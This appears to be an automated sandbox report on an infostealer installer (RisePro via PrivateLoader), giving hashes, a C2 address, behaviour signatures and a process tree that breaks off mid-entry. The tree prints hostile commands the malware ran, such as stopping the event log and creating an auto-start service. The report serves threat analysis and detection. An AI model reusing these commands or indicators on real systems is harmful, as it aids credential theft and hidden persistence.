Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    14-06-2024 12:50

General

  • Target

    setup.exe

  • Size

    770.0MB

  • MD5

    2c53438c49053ca4527fba68d896c6e5

  • SHA1

    0d00c3991548b6e4fd17cd223271e0a15cb7e84a

  • SHA256

    912a6f22b8f39b437711afda5c7b7c1f6590f77330cdb6e92ac1294459802fff

  • SHA512

    1b22f804af98dbd6f7c7eb948bb30a0e8c3c17b37f42f3f907913427a09998e611f720a224b60c740e7eb8324fb479f50d5bdc097cef2ff04748a78561842536

  • SSDEEP

    49152:gwVVDUleHEr/Fx2xA+5aSwXtnohOIAynnSueGngj976RCfMyaiJuz4hg3:g0V4lrr9x2+G0WOIAynSueGgjNBbKsh

Malware Config

Extracted

Family

risepro

C2

147.45.47.126:58709

Signatures

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 7 IoCs
  • Sets file execution options in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 63 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 23 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 26 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 7 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 25 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Modifies firewall policy service
    • Checks computer location settings
    • Loads dropped DLL
    • Drops file in System32 directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Users\Admin\Documents\SimpleAdobe\yAkzRmNS3WuzlnezN55DpKBJ.exe
      C:\Users\Admin\Documents\SimpleAdobe\yAkzRmNS3WuzlnezN55DpKBJ.exe
      2⤵
      • Executes dropped EXE
      • Checks processor information in registry
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      PID:2388
    • C:\Users\Admin\Documents\SimpleAdobe\nGV4Qi_xXP9mTEgyUF_1ZyXE.exe
      C:\Users\Admin\Documents\SimpleAdobe\nGV4Qi_xXP9mTEgyUF_1ZyXE.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2604
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2460
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1920
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "RULTVSKP"
        3⤵
        • Launches sc.exe
        PID:2180
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:2076
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:2396
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "RULTVSKP"
        3⤵
        • Launches sc.exe
        PID:3000
    • C:\Users\Admin\Documents\SimpleAdobe\EqnTVL8VZ6tdogzUlWVamtEw.exe
      C:\Users\Admin\Documents\SimpleAdobe\EqnTVL8VZ6tdogzUlWVamtEw.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Users\Admin\AppData\Local\Temp\is-N8OG8.tmp\EqnTVL8VZ6tdogzUlWVamtEw.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-N8OG8.tmp\EqnTVL8VZ6tdogzUlWVamtEw.tmp" /SL5="$6014E,4906577,54272,C:\Users\Admin\Documents\SimpleAdobe\EqnTVL8VZ6tdogzUlWVamtEw.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Users\Admin\AppData\Local\M4A to MP3 Free Converter\m4atomp3converter.exe
          "C:\Users\Admin\AppData\Local\M4A to MP3 Free Converter\m4atomp3converter.exe" -i
          4⤵
          • Executes dropped EXE
          PID:2492
        • C:\Users\Admin\AppData\Local\M4A to MP3 Free Converter\m4atomp3converter.exe
          "C:\Users\Admin\AppData\Local\M4A to MP3 Free Converter\m4atomp3converter.exe" -s
          4⤵
          • Executes dropped EXE
          PID:2840
    • C:\Users\Admin\Documents\SimpleAdobe\IcLxIl6K7yrnEtxSnpLaMpcg.exe
      C:\Users\Admin\Documents\SimpleAdobe\IcLxIl6K7yrnEtxSnpLaMpcg.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks for any installed AV software in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:540
      • C:\Users\Admin\AppData\Local\Temp\aj6117.exe
        "C:\Users\Admin\AppData\Local\Temp\aj6117.exe" /relaunch=8 /was_elevated=1 /tagdata
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks for any installed AV software in registry
        • Checks whether UAC is enabled
        • Writes to the Master Boot Record (MBR)
        • Drops file in Program Files directory
        • Checks SCSI registry key(s)
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2552
        • C:\Users\Admin\AppData\Local\Temp\nso676C.tmp\AVGBrowserUpdateSetup.exe
          AVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          PID:3064
          • C:\Program Files (x86)\GUM76C5.tmp\AVGBrowserUpdate.exe
            "C:\Program Files (x86)\GUM76C5.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome"
            5⤵
            • Sets file execution options in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Writes to the Master Boot Record (MBR)
            • Drops file in Program Files directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            PID:2868
            • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
              "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies registry class
              PID:668
            • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
              "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies registry class
              PID:1628
              • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Registers COM server for autorun
                • Modifies registry class
                PID:1664
              • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Registers COM server for autorun
                • Modifies registry class
                PID:2424
              • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Registers COM server for autorun
                • Modifies registry class
                PID:1060
            • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
              "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTY5My42IiBzaGVsbF92ZXJzaW9uPSIxLjguMTY5My42IiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0iezYyMEQyQUQ2LUVCMkUtNDdFQS05OTY0LTE1QjM0MTREMUQwQ30iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9Ins0OUIzQ0UyOS1EQ0EzLTQ1OTktQTVDQi04MjUzQTdDRjkyQjR9IiB1c2VyaWRfZGF0ZT0iMjAyNDA2MTQiIG1hY2hpbmVpZD0iezAwMDA1OEQ0LUIyN0EtMDEyQi05RTNFLTQ1NDE0NzFFNkM2OX0iIG1hY2hpbmVpZF9kYXRlPSIyMDI0MDYxNCIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9Ins5RkI3MjVEQy1DQ0M0LTQwQzEtQUM1My1COEFEQjg2RDE1NDd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjYuMS43NjAxLjAiIHNwPSJTZXJ2aWNlIFBhY2sgMSIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNjkzLjYiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTI0OSIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMTkzNCIvPjwvYXBwPjwvcmVxdWVzdD4
              6⤵
              • Executes dropped EXE
              PID:1644
            • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
              "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome" /installsource otherinstallcmd /sessionid "{620D2AD6-EB2E-47EA-9964-15B3414D1D0C}" /silent
              6⤵
              • Executes dropped EXE
              PID:2336
        • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
          AVGBrowser.exe --heartbeat --install --create-profile
          4⤵
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Writes to the Master Boot Record (MBR)
          • Checks SCSI registry key(s)
          • Enumerates system info in registry
          PID:2708
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=109.0.24111.121 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6116b78,0x7fef6116b88,0x7fef6116b98
            5⤵
            • Executes dropped EXE
            PID:2004
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:2
            5⤵
            • Executes dropped EXE
            PID:2600
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --mojo-platform-channel-handle=1500 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2336
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1572 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:484
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2408 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:1
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:656
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2424 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:1
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:2952
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2880 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2772
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2944 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:1
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:2588
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2916 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2340
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1800 --field-trial-handle=1300,i,13859506832798292811,11131843326081101633,131072 /prefetch:2
            5⤵
            • Executes dropped EXE
            PID:2272
        • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
          AVGBrowser.exe --silent-launch
          4⤵
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Checks for any installed AV software in registry
          • Writes to the Master Boot Record (MBR)
          • Checks SCSI registry key(s)
          • Enumerates system info in registry
          PID:2948
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=109.0.24111.121 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6116b78,0x7fef6116b88,0x7fef6116b98
            5⤵
            • Executes dropped EXE
            PID:2548
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:2
            5⤵
            • Executes dropped EXE
            PID:2576
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --mojo-platform-channel-handle=1380 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2804
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1564 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:1668
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --start-stack-profiler --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2380 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:1
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:3032
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2388 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:1
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:2512
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1388 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:2
            5⤵
            • Executes dropped EXE
            PID:696
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1328 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:1532
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --disable-protect
            5⤵
            • Executes dropped EXE
            PID:1284
            • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
              "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=109.0.24111.121 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6116b78,0x7fef6116b88,0x7fef6116b98
              6⤵
              • Executes dropped EXE
              PID:1712
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2148
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3872 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:836
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3720 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2856
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3476 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:2536
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1328 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
            • Executes dropped EXE
            PID:656
          • C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe
            "C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1268,i,14871975610563017394,6637356995839660767,131072 /prefetch:8
            5⤵
              PID:1988
      • C:\Users\Admin\Documents\SimpleAdobe\zrmfVlwrCijHYLaOHwtRkgei.exe
        C:\Users\Admin\Documents\SimpleAdobe\zrmfVlwrCijHYLaOHwtRkgei.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1648
        • C:\Users\Admin\AppData\Local\Temp\7zS4CE8.tmp\Install.exe
          .\Install.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:892
          • C:\Users\Admin\AppData\Local\Temp\7zS5532.tmp\Install.exe
            .\Install.exe /hsdidPpAQu "385135" /S
            4⤵
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Enumerates system info in registry
            PID:1596
            • C:\Windows\SysWOW64\cmd.exe
